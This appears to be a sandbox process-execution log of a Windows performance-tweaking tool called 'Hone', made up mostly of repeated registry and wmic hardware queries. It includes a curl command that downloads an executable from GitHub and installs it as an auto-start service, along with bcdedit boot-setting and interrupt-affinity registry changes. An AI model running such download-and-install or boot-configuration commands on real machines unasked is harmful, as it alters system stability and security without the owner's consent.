reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\sc.exe
sc config "STR" start= auto
C:\Windows\system32\net.exe
net start STR
C:\Windows\system32\curl.exe
curl -g -L -# -o "C:\Hone\Resources\SetTimerResolutionService.exe" "https://github.com/auraside/HoneCtrl/raw/main/Files/SetTimerResolutionService.exe"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start STR
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /i SetTimerResolutionService.exe
C:\Windows\system32\sc.exe
sc config "STR" start=auto
C:\Windows\system32\net.exe
net start STR
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start STR
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformclock
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get buildnumber /value
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformtick
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Hone" /v AffinityTweaks /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfCores /value | find "="
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get NumberOfCores /value
C:\Windows\system32\find.exe
find "="
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfLogicalProcessors /value | find "="
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get NumberOfLogicalProcessors /value
C:\Windows\system32\find.exe
find "="
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_USBController get PNPDeviceID| findstr /l "PCI\VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_USBController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /l "PCI\VEN_"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "08" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get PNPDeviceID| findstr /l "PCI\VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /l "PCI\VEN_"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "02" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID| findstr /l "PCI\VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /l "PCI\VEN_"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "04" /f
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\sc.exe
sc config "STR" start= auto
C:\Windows\system32\net.exe
net start STR
C:\Windows\system32\sc.exe
sc config "STR" start=auto
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start STR
C:\Windows\system32\net.exe
net start STR
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start STR
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformclock
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get buildnumber /value
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformtick
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
